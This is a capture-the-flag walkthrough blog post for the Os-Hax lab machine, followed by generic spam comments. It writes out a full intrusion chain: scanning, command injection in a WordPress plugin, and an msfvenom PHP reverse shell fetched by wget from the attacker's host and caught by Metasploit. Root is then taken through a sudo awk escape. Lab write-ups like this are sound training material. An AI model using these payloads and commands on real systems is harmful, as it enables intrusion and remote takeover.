Today we are solving Os-Hax Walkthrough for and this CTF is designed by.. Rahul Gehlaut
You can download here. (Os-Hax Walkthrough)
Level: Intermediate
Boot to Root
Tool Used
- Netdiscover
- Dirb
- Nmap
- ExifTool
- Metasploit
Find of All IP We did this using the Netdiscover command
we can continue to our second step that is scanning the target With Nmap Aggressive scan
|
1 |
nmap -A 192.168.1.31 |
Type your machine IP in the web browser
Without wasting time enumerate the Directory
Enumerate the Directory With Dirb
|
1 |
dirb http://192.168.1.31 |
And Found some directory you will navigate to the following URL
|
1 |
http://192.168.1.31/img |
And Find A Our First Flag
Now Download Image file flaghost.png
Data Exfiltration-Steganography
Now After Download the image Extract-Data Image
And Find Next Hint found a directory [email protected]
After Open the directory find the Flag2.txt
Open the file Flag2.txt
And Find Brain-Fuck Encode Code
And After Decode the Coad Find A WordPress Password
Decoder Website https://www.splitbrain.org/_static/ook/
Username: web
Password: [email protected]
Next Step is Add a host file some Text
Vi /etc/hosts
After Add, My CTF IP and localhost Save the file
And Open Follow the URL Find a WordPress Page
|
1 |
http://localhost/wordpress |
Without waste a time open the WordPress login panel
|
1 |
http://localhost/wordpress/wp-login.php |
And login with already found password
And after login WordPress Found a vulnerable Plugin Activity Manager
And open Activity Manager tool found a command injection
Let’s Check the command
|
1 |
127.0.0.1 |id |
And this is working after the command I see the output
After Check command injection work and create our payload with Metasploit
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4545 -f raw
open vi editor save the output text payload.php
create a Python Server
|
1 |
python -m SimpleHTTPServer |
wget command download our payload target machine
First, remove maxlenght=15 to 100 inspect element
|
1 |
127.0.0.1 | wget http://192.168.1.2:8000/payload.php |
Execute our payload this command 127.0.0.1 | php payload.php
|
1 |
Msfconsole |
|
1 |
use exploit/multi/handler |
|
1 |
set payload php/meterpreter/reverse_tcp |
|
1 |
set lhost 192.168.1.1 |
|
1 |
set lport 4545 |
|
1 |
run |
And got a reverse connection
First import python for proper shell
|
1 |
python -c ‘import pty;pty.spawn(“/bin/bash”)’ |
|
1 |
cd /home |
|
1 |
ls |
|
1 |
cd web |
|
1 |
ls |
and I see our 3 flag
|
1 |
cat flag.txt |
Privilege Escalation
For finding the 4th flag we need to escalate root privilege, let’s identify sudo rights for Alice with the help of the following command.
|
1 |
sudo -l |
So here Alice can run awk as root without using the password and we can easily spawn root shell by exploiting this permission
|
1 |
sudo /user/bin/awk 'BEGIN {system("/bin/bash")}' |
|
1 |
id |
|
1 |
cd /root |
|
1 |
ls |
|
1 |
cat final.txt |
FLAG 4: COMPLETE! Congratulations
Author Name: Rahul Gehlaut see more blog here
Helpful info. Lucky me I discovered your website unintentionally, and I’m shocked why this coincidence didn’t happened
in advance! I bookmarked it.
I’m not that much of an online reader, to be honest, but your sites really nice, keep it up! I’ll go ahead and bookmark your website to come back later on. Many thanks
I know this if off topic but I’m looking into starting my own blog and was wondering what all is required to get set up?
I’m assuming having a blog like yours would cost a pretty penny?
I’m not very internet savvy so I’m not 100% certain.
Any recommendations or advice would be greatly appreciated.
Thanks